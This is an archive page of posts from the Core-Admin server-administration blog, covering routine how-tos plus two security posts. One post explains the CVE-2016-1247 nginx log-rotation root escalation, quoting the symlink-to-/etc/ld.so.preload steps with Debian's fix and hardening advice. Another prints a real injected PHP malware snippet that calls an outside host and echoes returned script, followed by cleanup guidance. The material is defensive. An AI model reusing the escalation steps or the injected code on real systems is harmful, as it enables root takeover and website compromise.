 |
Core-Admin Server admin easy |
Archive for Core-Admin
Hardware failure with #InnoDB #MySQL that is not recovering even with innodb_force_recovery?
Here is how to solve and fix the problem with #CoreAdmin (database reimport:
Posted in: Core-Admin, InnoDB, MySQL
Leave a Comment (0) →[extoc]
By default, all hostings created with Core-Admin will have an individual user to ensure each hosting runs with isolated permissions.
This hosting user has no way to access through ssh, even it if opened ssh port and a password is configured.
This article, explain how to enable or disable ssh access for a given hosting using Core-Admin.
Be sure you have a firewall controlling SSH port (usually 22/tcp) to avoid leaving it open for everyone. It should be limited.
If you don’t have a firewall installed, use #Firewall manager. See the following manual to know how to configure it.
Use the following steps. You will need Administrator rights to complete these steps.
First, open #WebHostingManagement application like this:
Then, open available option to manage SSH access:
After that, select the right hosting to configure and if you want to enable or disable SSH access like this:
Once the process is completed, the system will present you a set of configuration notes ready to use:
In the case you want to disable SSH access, just follow same steps as described before but selecting “disable” inside “Ssh access”.
Use available option located at the top level tree:
If you have problems while accessing to a mailbox and after reviewing logs you find something like:
Jul 4 10:44:22 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record)) Jul 4 10:44:31 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record)) Jul 4 10:45:04 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record)) Jul 4 10:45:23 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record)) Jul 4 10:45:34 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record)) Jul 4 10:46:40 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record)) Jul 4 10:48:45 claudia dovecot: imap(someuser@core-admin.com): Panic: file mail-index-sync-keywords.c: line 227 (keywords_update_records): assertion failed: (data_offset >= sizeof(struct mail_index_record))
Then, one or more dovecot index and/or cache files are broken. This happens due to moving a mailbox from different dovecot versions. It can also happens with
outdated dovecot servers.
Core-Admin will detect these errors automatically and will report a: dovecot_mailbox_broken_indexes
Click on it and then click on “Reset dovecot indexes”.
That will clear all dovecot indexes at the destination machine, for the failing mailbox.
If you want to fix it manually, locate mailbox associated to the user and run the following command
(update it accordingly to the user mailbox failing):
>> find /var/spool/dovecot/mail/core-admin.com/someuser -name 'dovecot*' -type f -delete"
After that, you should have fixed the problem. No dovecot restart required.
Posted in: Core-Admin, Dovecot
Leave a Comment (0) →This article explores CVE-2016-1247 exploit, how it was fixed by Debian and what leasons we can extract from it to even go further to protect/secure your systems.
This article also applies to CVE-2016-6664-5617, MySQL root escalation, though it is not a Debian especific issue, it is the same concept failure at the mysql wrapper that allowed the PoC author (Dawid Golunski) to create a working exploit.
Recently Dawid Golunski (https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html) reported a working PoC that successfully escales from www-data (default nginx user) to full root account power. Fiu!
Taking a closer look into the bug, reducing the steps taken by Dawid to break the system and skipping some details for brevity, these are the following:
/var/log/nginx/*.log
create 0640 www-data adm
That is, logrotate will rotate and “create” (that’s the point) an empty file with www-data:adm permissions. It looks harmless. This is the devil in the detail.
rm /var/log/nginx/error.log
ln -s /etc/ld.so.preload /var/log/nginx/error.log
NOTE: for those wondering, “what the heck is that file for?”
Basically that file allows to configure “libraries” to “preload” before any other library before launching the binary.
In essence, it is a mechanism that allows “intercepting” symbols/functions to replace its code by yours. It can be used as a mechanism “for external fix” without binary modification, but, as many mechanisms, it can be used for evil.
For more information, see: http://man7.org/linux/man-pages/man8/ld.so.8.html
Right, we wanted to go through how PoC works to better understand fix introduced and what we can learn from it.
Going back to the solution, if we take a look at Debian’s changelog for this, what they have done is to “secure” permissions for that log to be owned by “root:adm” rather than “www-data:adm”:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842295
+ * debian/nginx-common.postinst:
+ + CVE-2016-1247: Secure log file handling (owner & permissions)
+ against privilege escalation attacks. /var/log/nginx is now owned
+ by root:adm. Thanks ro Dawid Golunski for the report.
+ Changing /var/log/nginx permissions effectively reopens #701112,
+ since log files can be world-readable. This is a trade-off until
+ a better log opening solution is implemented upstream (trac:376).
+ (Closes: #842295)
Certainly, having “/var/log/nginx” be owned by root:adm makes impossible for www-data to remove /var/log/nginx/error.log and then trick “logrotate” to create a /etc/ld.so.preload owned by www-data (which is crux).
However, are there more leassons we can learn to better secure the system against this kind of log rotate escalation? Keep on reading.
One of the problems that this nginx service setup has is that it does not separate log handling from log production. By making nginx service to handle log directly, instead of using syslog, it creates a permission problem that cannot be easily solved/secured.
If you separate log handling (so syslog handles all logs produced by nginx), you can secure all logs (owned and accessible by root:adm), rotate them, etc, without worrying about the user/users (hopefully low permission users) can do. They can only attack files owned by that user (hopefully only web files) which are not rotated.
See https://nginx.org/en/docs/syslog.html (to start using syslog for your nginx setup)
As an example, the following is wrong:
service-user:adm 640 # bad/weak configuration
…and a good definition is:
root:adm 640 # This is the good/recommended configuration because it prevents user
# deleting this log and creating a link to sensitive files.
Some services comes with a default “package setup” that do not allow changing this log user to “root” because these services need to be able to open and write to these logs.
In any case, all these services CAN be configured to use syslog and you should consider configuring your system to do so.
In fact, Dawid Golunski also discovered “exactly” the same type of failure in MySQL packages, where a log escalation to root is possible (https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html ).
That’s why it is very important to concentrate log reporting/handling to syslog so you can separate service from log handling (which solves all these problems).
Again, if you make your system service to run with a low level permission user (i.e.: mysql, www-data, clamav,..), and log reporting is handled and written by a separate daemon service (rsyslog, for example), you can safely create “lograte” configurations that are “always” safe and do not depend on “wrapper script failures” or “packiging problems” that might end up making very controversial decisions (more about this later).
Because this is life and you cannot control how packaging is done, how supervision wrappers are written, etc, you can block these kind of attacks by doing:
touch /etc/ld.so.preload chown root:root /etc/ld.so.preload # you might be already hacked chmod 644 /etc/ld.so.preload # i hope not, chattr +i /etc/ld.so.preload
This way you make sure file exists and cannot be updated (even for the root! unless the attacker already owns root to remove the +i flag).
With this setting you completely disable Dawid’s PoC and make it more dificult to allow log rotate escalation techniques.
The “logrotate” service is part of the scheme to attack the system by creating “weak” configurations that “rotates” using low privilege users like following (Debian example):
/etc/logrotate.d/mysql-server: create 640 mysql adm
As shown in https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html, this configuration can be exploited (log escalation from mysql user). The best thing to do is to make MySQL service to use syslog to handle all log reporting and update that file to make log owner system to be:
/etc/logrotate.d/mysql-server: create 640 root adm
Knowing this, you can use the following command to review those logrotate configurations that are possible breaches in your system:
find /etc/logrotate.d /etc/logrotate.conf -type f -exec grep -H create {} \; | grep -v "create 640 root adm"
You might be thinking “well, this is something internal..” or “I can handle it”. Maybe. In any case, let’s take a closer look into what “really” did Debian to fix this issue by looking at the changelog:
nginx-common (1.6.2-5+deb8u3) jessie-security; urgency=high In order to secure nginx against privilege escalation attacks, we are changing the way log file owners & permissions are handled so that www-data is not allowed to symlink a logfile. /var/log/nginx is now owned by root:adm and its permissions are changed to 0755. The package checks for such symlinks on existing installations and informs the admin using debconf. That unfortunately may come at a cost in terms of privacy. /var/log/nginx is now world-readable, and nginx hardcodes permissions of non-existing logs to 0644. On systems running logrotate log files are private after the first logrotate run, since the new log files are created with 0640 permissions. -- Christos Trochalakis Tue, 04 Oct 2016 15:20:33+0300
That is, Debian has taken the path of limiting link creation but, at the cost of allowing all users accessing that directory. In fact, during package upgrade/installation they attempt to detect possible hacking links by reporting to the user:
Template: nginx/log-symlinks
Type: note
_Description: Possible insecure nginx log files
The following log files under /var/log/nginx directory are symlinks
owned by www-data:
.
${logfiles}
.
Since nginx 1.4.4-4 /var/log/nginx was owned by www-data. As a result
www-data could symlink log files to sensitive locations, which in turn
could lead to privilege escalation attacks. Although /var/log/nginx
permissions are now fixed it is possible that such insecure links
already exist. So, please make sure to check the above locations.
As you can see, “Yes”, the security update allows all system users to be able to access these logs and “Yes”, the security update do not fixes hackings in place, you have to review them any way.
This might (and it is) interesting but, for the scope of this article, as you can see, if you don’t fix your system setup to “separate log handling from log production” you will have to live with very bad decisions that otherwise can be easily solved (and are not Debian’s responsability, by the way).
With all these details explained, Core-Admin does two things to mitigate this kind of “root log escalation” attacks:
Posted in: Core-Admin, Debian, LogRotate, Security
Leave a Comment (0) →The following short guide will give you tips on how to configure let’s encrypt certificate for your Core-Admin web administration panel. That is, the certificate used by the panel to secure all comunication between your web browser and the Core-Admin server.
These indications depends on the current status of your Core-Admin installation and your preference about doing it from console or using the web panel.
If you have a working Core-Admin with web access, you can install “Let’s encrypt Management” application and then use the specific option to request and configure a Let’s encrypt certificate for your local server. Here is how:
After you have installed the tool (or if you already have it), open the tool, and follow these steps:
Let's encrypt management -> Actions -> Certificate for Core-Admin server (follow instructions from there)
In the case you are already using Core-Admin with let’s encrypt tool, you can use the following command to request, install and reconfigure your core-admin server with a let’s encrypt certificate:
>> crad-lets-encrypt.pyc -s <your-contact-email>
In the case you have just installed core-admin, you can use the following command to install Let’s encrypt application, Certificate manager and request the certificate for your core-admin server:
>> cd /root >> wget http://www.core-admin.com/downloads/core-admin-installer.py >> chmod +x core-admin-installer.py >> ./core-admin-installer.py --core-admin-le-cert=<your-contact-email>
The difference between this command and crad-lets-encrypt.pyc is that the later is only available when you already have Let’s encrypt management tool installed. Otherwise crad-lets-encrypt.pyc will not be available.
Posted in: Administration, Certificates, Core-Admin, Let's Encrypt, Security, SSL/TLS
Leave a Comment (0) →Inside Core-Admin, with the Mail admin app, you configure a notification that is sent when mailboxes are overquota (admin notification) but also you can make the system to send a quota notification to the end user directly.
For that, open Mail Admin app and go to the quota notification options as shown in the following video:
However, in the case you want to change when are those quota notified and the frequency, you will have to:
chattr +i /etc/cron/crad-mail-quotas
Core-Admin starting from revision 5110, supports configuring easily the max POST size you can do to a given web size, known also as php settings “post_max_size” and el “upload_max_filesize”.
For that, get inside your Core-Admin panel as admin user, select a particular web site you want to update, and then click to “Site options”
If the option is not configured, it will be shown as “not configured”. Now, you only have to select it by clicking over it, then setup the required value (in megabytes MB) and then click on “Edit option”. With that you are done.
Posted in: Apache2, Core-Admin, Core-Admin Web Edition, PHP
Leave a Comment (0) →In the case you want to show a default web page with a customized “unknown webpage” when accesing to your server with an unknown web page that is not supported or maybe it is supported by in a different address (like accessing with https:// on a web page that is only supported on http://), then, you can do it by following next steps:
1. First, access to the Webhosting management and click on “Options”, then click on “Configure server”:
2. After that, click on “Configure default site” and inside, setup the content and save it:
Posted in: Core-Admin, Core-Admin Web Edition, Web hosting
Leave a Comment (0) →After a revision you find out that several web pages have been updated with code like follow or maybe a customer whose web is being blocked by the web browser is calling you because it is including suspicous code like:
<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>
These attacks do not pose any harm to the server if it is properly configured, but makes affected webpages to execute remote chatting code o ads that will make google chrome and many other browsers to block those pages because running that suspicious code.
The problem about these attacks is that they update original files by including a “chirurgical” modifications making it difficult and annoying to get back to original state.
One option is to have a backup, but with the newer webs which use different shorts of caches and php-to-string files, makes it hard to recover. It is not possible to just recover those files by just replacing. You must get back to a consistent state (for example the last backup). This implies removing current web files and recover from backup files (so backup files don’t get mixed with current files that weren’t including at the backup).
After this, you must remember resetting/blocking all FTP accounts/password that were used during the attack.
Core-Admin provides you these knoledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like follows:
Core-Admin: detecting php hash attack
After receiving this notification, you only have to run the following comand to find out the amount of files that were modified and the amount of FTP accounts that were compromised. The same command will help you through out the process of recovering infected files and updating ftp accounts’ password.
>> crad-find-and-fix-phphash-attack.pyc
After running above command, which only reports, you can now execute the same command with the following options to fix found files and to update FTP accounts:
>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts
This attack is connected with a network of servers that are in charge of applying these modifications along with a virus/malware software that infects machines that use known FTP clients. Here is how the attack develops:
It is important to understand that modification servers do not carry out the attack just after receiving compromised FTP passwords. They will wait to have several passwords to the same system and also they will delay the attack to disconnect both incidents (the web hack and the infection at your computers).
This way, they hope unaware users to not connect both incidents which otherwise will trigger a anti-virus scan by the user to stop information leaking.
In the other hand, they also wait to have several accounts to carry out a massive attack looking for confusion and/or magnitude to increase likehood that part of the infection will survive.
There are several actions you can take to avoid these attacks:
Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security
Leave a Comment (0) →For next Core-Admin release we have included a handy checker (rbl_check_checker) that allows to check against more than 100 known DNS rbl blacklists if any of your server IPs is blacklisted. And, if any server is listed, the checker tells you where to go to get more information to proceed to unblock them.
The checker also detects local lan IPs and in that case, it uses automatically a remote service to guess which public IP is running your server. Now, with this information the checker is able to also check for blacklisting those local/lan servers.
The checker integrates automatically into your Core-Admin and will give you fresh information for all your servers connected to the panel. See in action:
By having rbl-check checker running in your servers you can improve hugely your servers IP reputation because you can get instant information about any blacklisting for any running IP as it happens.
A prompt response is key to solve IP reputation problems. The faster you solve them, the less your mail services get affected. With that information you can react promptly taking required measures and to request IP blacklist removal.
Posted in: Blacklist, Core-Admin, Security
Leave a Comment (0) →